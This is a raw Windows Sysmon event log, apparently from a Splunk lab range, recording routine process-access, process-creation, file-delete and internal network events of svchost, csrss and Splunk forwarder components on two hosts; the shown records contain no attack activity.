10341000x8000000000000000222094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1890-6216-2F05-000000003902}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.951{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1890-6216-2F05-000000003902}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.952{4F8D34B0-1890-6216-2F05-000000003902}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:48.841{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130D939F7E970783CCD9B82E40AA5FC3,SHA256=182BDB356CF641932E60E8DDA63520469BFEF9BED73DC40BF1F2C5B48CF18FF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:48.753{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8FFDE5AE2D1EF9115366163C073BFF,SHA256=7384A7E0019B70801D5FA6CAAE8619930399F179D3CF0551D093337A8FE7AB1C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.093{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51693-false10.0.1.12-8089- 23542300x8000000000000000298198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:49.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC6B62029924F9153BF2F7E770C8EE7A,SHA256=BF81DDB42C6CFDC14F0F3007B10646028374D06E573ABDF23822DE5AC8342CA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.669{4F8D34B0-1891-6216-3005-000000003902}32722888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1891-6216-3005-000000003902}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1891-6216-3005-000000003902}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.451{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1891-6216-3005-000000003902}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.452{4F8D34B0-1891-6216-3005-000000003902}3272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:46.670{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51694-false10.0.1.12-8000- 10341000x8000000000000000222102Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:49.169{4F8D34B0-1890-6216-2F05-000000003902}3616904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000298200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:48.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49515-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:50.785{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A92D9BD8003F900CAC272B7953920F64,SHA256=A51D586A69B6BE5212FFF841EB90C79ED4DF3A4C493DF0A2FE7C9F1C6715727E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:50.107{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E40BBBFD19B43D78FB33D49DF573FB8C,SHA256=F524028CBFE67A24567975D14E050B1A19A5795C9C0120531B3B5720A8AF1606,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:50.107{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D85F86F41F6B95169545F7F90B08474,SHA256=55E94831443555396F1492E7AE2048267927EEFB7F518CF4D0966BEF76EFDD1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:51.853{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56C5F32693F62828B4830ADB6D8325EC,SHA256=8DE5B8367A76EA100562D172C9B14337A2B69E18D4596912579088941990D795,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:51.248{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1893-6216-3105-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 